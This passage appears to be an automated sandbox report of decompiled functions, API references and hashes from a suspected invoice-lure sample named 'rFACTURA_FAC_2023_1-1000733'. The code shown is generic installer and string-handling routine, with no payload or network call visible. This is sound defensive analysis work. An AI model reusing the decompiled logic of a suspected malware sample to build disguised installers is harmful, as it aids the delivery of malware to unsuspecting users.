				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t41;
							goto L12;
						} else {
							_t37 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E10001243();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t42 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t38 =  *_t51;
						_t51[7] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E1000122C(0x10004044);
					goto L10;
				}
			}

0x100022e4
0x100022e8
0x100022f3
0x100022f3
0x100022fa
0x100022ff
0x00000000
0x00000000
0x10002303
0x10002306
0x00000000
0x00000000
0x1000230b
0x10002316
0x10002326
0x00000000
0x1000231d
0x1000231f
0x10002335
0x00000000
0x10002335
0x1000230d
0x1000230d
0x10002336
0x10002336
0x10002338
0x1000233c
0x1000233c
0x1000233f
0x1000233f
0x10002347
0x1000234e
0x10002351
0x10002410
0x10002411
0x1000241c
0x10002446
0x10002446
0x1000242c
0x10002438
0x1000242e
0x1000242e
0x1000242e
0x00000000
0x10002357
0x10002357
0x00000000
0x1000235e
0x00000000
0x00000000
0x10002366
0x00000000
0x00000000
0x10002374
0x10002376
0x00000000
0x00000000
0x10002397
0x1000239d
0x100023a0
0x100023a2
0x100023b2
0x00000000
0x00000000
0x1000237f
0x10002384
0x10002387
0x10002388
0x00000000
0x00000000
0x100023be
0x100023c4
0x100023c5
0x100023c8
0x100023c9
0x100023cb
0x00000000
0x00000000
0x100023d7
0x100023da
0x100023e6
0x100023e8
0x00000000
0x00000000
0x100023f4
0x10002400
0x10002403
0x10002405
0x10002408
0x00000000
0x00000000
0x10002357
0x10002351
0x1000232b
0x10002330
0x00000000
0x10002330

APIs

GlobalFree.KERNEL32(00000000), ref: 10002411

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65

Uniqueness

Uniqueness Score: -1.00%

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x10001619
0x10001625
0x10001632
0x10001639
0x10001642
0x1000164e

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000000.00000002.1463432748.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1463396007.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463469816.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1463524699.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00401D57 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D57() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
				GetClientRect(_t25, _t27 - 0x58);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401d63
0x00401d6a
0x00401d99
0x00401da1
0x00401da8
0x00401da8
0x00402ac2
0x00402ace

APIs

GetDlgItem.USER32(?,?), ref: 00401D5D
GetClientRect.USER32(00000000,?), ref: 00401D6A
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
DeleteObject.GDI32(00000000), ref: 00401DA8

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 3d379d5cf174b1f3754fd0e8aded0e40a14ad1f56653ff3a87a584377fb567a4
Instruction ID: d6b80873b4a6bbd9af873cfa92cf23dd081e8a17906ab7f6c0372a94bb23d9f5
Opcode Fuzzy Hash: 3d379d5cf174b1f3754fd0e8aded0e40a14ad1f56653ff3a87a584377fb567a4
Instruction Fuzzy Hash: 03F0ECB2604518AFDB41DBE4DE88CEEB7BCEB48341B14446AF641F6191CA789D118B68

Uniqueness

Uniqueness Score: -1.00%

Function 00404A7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404A7F(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406281(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406281(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406281(_t44, _t50, 0x7a1f20, 0x7a1f20, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f20) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a79f8, _a4, 0x7a1f20);
			}

0x00404a88
0x00404a8d
0x00404a95
0x00404a96
0x00404aa3
0x00404aab
0x00404aac
0x00404aae
0x00404ab0
0x00404ab2
0x00404ab5
0x00404ab5
0x00404abc
0x00404ac2
0x00404ac2
0x00404ac9
0x00404ad0
0x00404ad3
0x00404ad6
0x00404ad6
0x00404ada
0x00404aea
0x00404aec
0x00404aef
0x00404a98
0x00404a98
0x00404a9f
0x00404a9f
0x00404af7
0x00404b02
0x00404b18
0x00404b29
0x00404b45

APIs

lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 00404B20
wsprintfW.USER32 ref: 00404B29
SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B3C

Strings

%u.%u%s%s, xrefs: 00404B0A

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: e52f1a5f5cfb5a9a0e1921420a7f7e901b35480ee7d38de5188ba9653754f71b
Instruction ID: e59333b35207274dfa12745fa15a0a2b1e84881af2dc0bba7fa0e94120285970
Opcode Fuzzy Hash: e52f1a5f5cfb5a9a0e1921420a7f7e901b35480ee7d38de5188ba9653754f71b
Instruction Fuzzy Hash: AD11EB73A441283BDB00A66D9C45E9E3298DB85374F250237FE26F21D1DD78C82286E8

Uniqueness

Uniqueness Score: -1.00%

Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C19(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402C15(3);
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 - 0x10) = _t29;
				_t30 = E00402C15("true");
				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402C37(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push("true");
				if(__eflags != 0) {
					_t59 = E00402C37();
					_t32 = E00402C37();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402C15();
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t41 = E00402C15(2);
					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x30) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0x30));
					E004061A6();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c19
0x00401c1b
0x00401c22
0x00401c25
0x00401c28
0x00401c32
0x00401c36
0x00401c39
0x00401c42
0x00401c42
0x00401c45
0x00401c49
0x00401c52
0x00401c52
0x00401c55
0x00401c59
0x00401c5b
0x00401cb0
0x00401cb2
0x00401cbd
0x00401cc7
0x00401cca
0x00401cca
0x00401cd3
0x00000000
0x00401c5d
0x00401c64
0x00401c66
0x00401c69
0x00401c6f
0x00401c76
0x00401c79
0x00401ca1
0x00401cd9
0x00401cd9
0x00401c7b
0x00401c89
0x00401c91
0x00401c94
0x00401c94
0x00401c79
0x00401cdc
0x00401cdf
0x00401ce5
0x00402a65
0x00402a65
0x00402ac2
0x00402ace

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1

Strings

!, xrefs: 00401C55

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 6465c28e5c943a4eb7eb01deaa6dcd84e082ef29e74d6367337f5043b789c329
Instruction ID: 77761fc61529e842a28ee3ca09cff7144389c8643cc82091ff338806125a9860
Opcode Fuzzy Hash: 6465c28e5c943a4eb7eb01deaa6dcd84e082ef29e74d6367337f5043b789c329
Instruction Fuzzy Hash: 9121C1B1948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502F61D0D7B84541DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00405BDB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BDB(WCHAR* _a4) {
				WCHAR* _t5;
				short* _t7;
				WCHAR* _t10;
				short _t11;
				WCHAR* _t12;
				void* _t14;

				_t12 = _a4;
				_t10 = CharNextW(_t12);
				_t5 = CharNextW(_t10);
				_t11 =  *_t12;
				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
					if(_t11 != 0x5c || _t12[1] != _t11) {
						L10:
						return 0;
					} else {
						_t14 = 2;
						while(1) {
							_t14 = _t14 - 1;
							_t7 = E00405B5D(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 2;
							if(_t14 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextW(_t5);
				}
			}

0x00405be4
0x00405beb
0x00405bee
0x00405bf0
0x00405bf6
0x00405c0e
0x00405c30
0x00000000
0x00405c16
0x00405c18
0x00405c19
0x00405c1c
0x00405c1d
0x00405c26
0x00000000
0x00000000
0x00405c29
0x00405c2c
0x00000000
0x00000000
0x00000000
0x00405c2c
0x00000000
0x00405c19
0x00405c05
0x00000000
0x00405c06

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,C:\Users\user\AppData\Local\Temp\nsp1D68.tmp,?,?,76F93420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405BE9
CharNextW.USER32(00000000), ref: 00405BEE
CharNextW.USER32(00000000), ref: 00405C06

Strings

C:\Users\user\AppData\Local\Temp\nsp1D68.tmp, xrefs: 00405BDC

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsp1D68.tmp
API String ID: 3213498283-808641140
Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction ID: 1410c8af8588119ed7c7bec0a33194e6879e2746ee2e5cb83f2c5ed70d44d846
Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction Fuzzy Hash: 26F09022918B2D95FF3177584C55E7766B8EB55760B00803BE641B72C0D3F85C818EAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405B30 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405B30(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405b31
0x00405b3e
0x00405b3f
0x00405b4a
0x00405b52
0x00405b52
0x00405b5a

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 00405B36
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,0040359C,?,00000006,00000008,0000000A), ref: 00405B40
lstrcatW.KERNEL32(?,0040A014), ref: 00405B52

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30

Memory Dump Source

Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411716682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411876056.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411917018.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1413813349.00000000007EF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
